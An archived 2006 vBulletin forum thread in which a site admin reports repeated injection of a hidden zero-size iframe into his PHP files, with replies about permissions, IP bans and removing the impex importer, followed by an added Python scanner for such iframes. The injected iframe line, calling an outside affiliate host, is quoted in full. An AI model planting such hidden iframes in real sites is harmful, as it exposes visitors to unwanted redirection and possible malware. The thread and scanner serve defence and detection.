vb.org Archive


gbechtel 08-01-2006 07:51 PM

Forum keeps getting hacked
 
I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:

echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

It is usually placed at the bottom of the PHP file, like in forumdisplay.php:

PHP Code:

$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms & $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], true, false);
$show['forumslist'] = iif ($forumshown, true, false);
$show['stickies'] = iif ($threadbits_sticky != '', true, false);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook = vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false;

The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?

davidw 08-01-2006 08:41 PM

You should be able to chmod them 644 I believe

bondjetta 08-01-2006 08:49 PM

Quote:

Originally Posted by christianb
You should be able to chmod them 644 I believe

Mine are 644'd and I'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com

gbechtel 08-01-2006 09:12 PM

Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?

gbechtel 08-04-2006 07:54 PM

The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

Quote:

There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :

Is there any way I can stop this guy????

davidw 08-04-2006 07:59 PM

IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.

gbechtel 08-04-2006 08:25 PM

Server co. says he is getting in through the impex directory....

davidw 08-04-2006 08:40 PM

Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

gbechtel 08-04-2006 08:44 PM

already done, hope that was it...

davidw 08-04-2006 08:45 PM

Don't forget to ban his IP addresses though :P
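
Added example, not part of the thread and not vBulletin code: a small Python scanner that walks a forum directory, reports every .php line containing a zero-width or zero-height iframe like the one quoted in the first post, records each file's mode (the thread shows that 444 did not prevent the edit), and flags a leftover impex directory. The sample tree, the tracker.example URL and the function names are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Assumption: an <iframe> with width or height 0 is never legitimate
# inside the forum's own .php source files.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?0(?![\d.%])", re.IGNORECASE)
SRC = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)

def scan_forum(root, importer_dir="impex"):
    """Return (findings, importer_present) for the forum tree under root.

    Each finding is (relative path, line number, iframe src, file mode).
    """
    findings, importer_present = [], False
    for dirpath, dirnames, filenames in os.walk(root):
        if importer_dir in dirnames:
            importer_present = True
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            # Mode is reported only for context: read-only does not mean clean.
            mode = oct(stat.S_IMODE(os.stat(path).st_mode))
            with open(path, encoding="latin-1") as fh:
                for lineno, line in enumerate(fh, 1):
                    if HIDDEN_IFRAME.search(line):
                        src = SRC.search(line)
                        findings.append((os.path.relpath(path, root), lineno,
                                         src.group(1) if src else None, mode))
    return sorted(findings), importer_present

def build_sample_tree():
    """Constructed sample: clean index.php, tampered forumdisplay.php, impex/."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "impex"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php\n$show['stickies'] = true;\n")
    tampered = os.path.join(root, "forumdisplay.php")
    with open(tampered, "w") as fh:
        fh.write("<?php\n$show['stickies'] = true;\n"
                 "echo \"<html><iframe width=0 height=0 frameborder=0 "
                 "src='http://tracker.example/index.php?aff=x'></iframe><html>\";\n")
    os.chmod(tampered, 0o444)  # read-only, yet already modified
    return root

if __name__ == "__main__":
    hits, importer = scan_forum(build_sample_tree())
    print(hits, "impex directory present:", importer)
```

Run on a schedule against the live forum root, a non-empty result is an earlier signal than visitors reporting pop-ups.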

